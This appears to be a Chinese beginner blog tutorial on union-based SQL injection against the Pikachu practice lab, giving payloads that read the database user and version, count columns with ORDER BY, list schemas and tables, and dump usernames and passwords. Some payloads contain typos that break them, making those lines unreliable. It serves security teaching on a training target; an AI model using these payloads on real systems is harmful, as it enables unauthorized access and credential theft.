【新手初学】读取数据库数据

利用注入点让SQL注入语句执行读取数据库数据相关的操作!

以下均以pikachu 靶场的字符型注入为例进行介绍说明

一、读取用户名,数据库版本信息

在原URL后面添加如下代码:

sql 复制代码
   ' union select user(),version()--+

效果:

补充:判断查询的字段个数order by

这时,就需要在相应环境下进行测试判断:主要是使用order by来判断

在后面添加1,2,3,4,5,6....进行测试,直到不再报错 !就判断出了其查询字段个数

如下:

二、读取mysql所有库名

在原URL后面添加如下语句:

sql 复制代码
' union select 1,group_concat(schema_name) from information_schema,schemata+--+

效果:

三、读取pikachu库的所有表名

在原URL后面添加如下语句:

sql 复制代码
'unnion select 1,group_concat(table_name) from information_schema.tables where table_schema=database+--+

效果:

四、读取所有字段数据

在原URL后面添加如下语句:

sql 复制代码
' union select 1,group_concat(id,0x7c,username,0x7c,password,0x7c,level,0x7c) from users+--+

效果:

相关推荐
北城以北88883 分钟前
ES6(二)
前端·javascript·es6
朕的剑还未配妥17 分钟前
移动端触摸事件与鼠标事件的触发机制详解
前端
墨鱼鱼22 分钟前
【征文计划】Rokid JSAR 实践指南:打造沉浸式 "声动空间盒" 交互体验
前端
携欢25 分钟前
Portswigger靶场之Exploiting a mass assignment vulnerability通关秘籍
前端·安全
兜兜风d'31 分钟前
redis字符串命令
数据库·redis·缓存
什么芋泥香蕉33033 分钟前
比 Manus 还好用?这款国产 AI,让 Python 小白也能玩转编程
前端·后端
为java加瓦34 分钟前
前端学AI:如何写好提示词(prompt)
前端·人工智能·prompt
qq_18417767741 分钟前
前端自动部署项目到服务器
服务器·前端·javascript
非凡ghost43 分钟前
猫眼浏览器(Chrome内核增强版浏览器)官方便携版
前端·网络·chrome·windows·软件需求
嗨丶王哪跑1 小时前
网络安全审计技术原理与应用
运维·网络·安全·web安全